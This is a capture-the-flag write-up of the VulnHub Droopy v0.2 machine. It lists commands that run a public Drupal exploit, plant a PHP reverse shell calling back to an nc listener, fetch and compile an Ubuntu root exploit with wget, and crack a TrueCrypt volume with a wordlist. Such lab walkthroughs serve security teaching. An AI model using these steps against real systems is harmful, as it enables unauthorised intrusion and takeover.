• Tweet
• Sumo

• Tweet

This video demonstrates how I solved the vulnhub Droopy v0.2 CTF challenge.

Steps

• Use Netdiscover to get the IP address of our target (Reconnaisance)
• Use Nmap to do a detailed scan of the target (Information Gathering)
• Use a publicly-available drupal exploit to creat admin account (Gaining Access)
• Upload a reverse connect script which will open an outbound TCP connection from the webserver to your host (Remote Access)
• Use a Ubuntu local privilege escalation exploit to gain root privileges (Privilege Escalation)

Commands

ifconfig
netdiscover -r 192.168.126.130
nmap -sS 192.168.126.136
Launch Firefox -> 192.168.126.136
Visit 192.168.126.136/CHANGELOG.txt
Search exploit-db.com for Drupal 7.3
Download exploit 34992
Save as Dru.py
python dru.py -t http://192.168.126.136 -u InfosecShinobi -p password1234
Login to 192.168.126.130 via the web browser
Visit Drupal's Modules page
Enable "PHP filter"
Save
Visit Drupal's configuration page
Click on "PHP Code"
Configure
Select administrator, authenticated user and anonymous user
Save configuration
Add content
Change text format to "php code"
Download php-reverse-shell.php
Edit php-reverse-shell.php
Put in your IP and a listening port i.e. 4445
Open your kali terminal
nc -lvvp 4445
Go back to browser
Copy and paste your edited php-reverse-shell code into the "add content" area of drupal
Save //Automatically, you get a shell
python -c 'import pty;pty.spawn("/bin/bash")'
cd /tmp
uname -a && cat /etc/issue
whoami
Launch browser
Search exploit-db for Ubuntu 14.04
Use exploit 37292
Save as over2.c
wget 192.168.126.130/over2.c
chmod +x over2.c
gcc over2.c
gcc over2.c -o over2
./over2
whoami && id
Gameover

Getting the Flag

**I stopped recording my screen immediately I got root – so you won't see this part in the video above.**

After gaining root, I looted the Droopy VM and then found out there there was something interesting in /var/mail/www-data

From Dave  Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave 
Subject: rockyou with a nice hat!
Message-ID: <730262568@example.com>
X-IMAP: 0080081351 0000002016
Status: NN

George,

   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam

Later,
Dave

There seems to be an encrypted file somewhere looking to be found :). I eventually found a truecrypt file dave.tc in the /root directory.

I tried cracking this truecrypt file using the truecrack tool "truecrack -t dave.tc -w r0cky0u.txt -v", and it took me some hours to realise there might just be a more efficient way to do this.

I went back to my hint again, and then it struck me – "we know what academy we went to". So yeah, grep to the rescue "grep -n "academy" r0cky0u.txt > academy.txt". With this, I got a new set of wordlist with words containing "academy".

Then I ran this in my terminal "truecrack -t dave.tc -w academy.txt -v" and I got the password after some minutes – "etonacademy".

I mounted this using Veracrypt, put in the password "etonacademy" and found our flag.txt in this directory /.secret/.top

Notes

• First Song – Enya – Wild Child
• Second Song – Sir Victor Uwaifo – Joromi
• Third Song – Kiss Daniel – Are you alright
• Video Length – 10minutes

Conclusion

Thanks to the team at VulnHub for hosting this CTF challenge. The challenge was fun, and I learnt new stuffs like using truecrack to crack a Truecrypt volume.

Kindly use the comment box below for feedbacks

– InfosecShinobi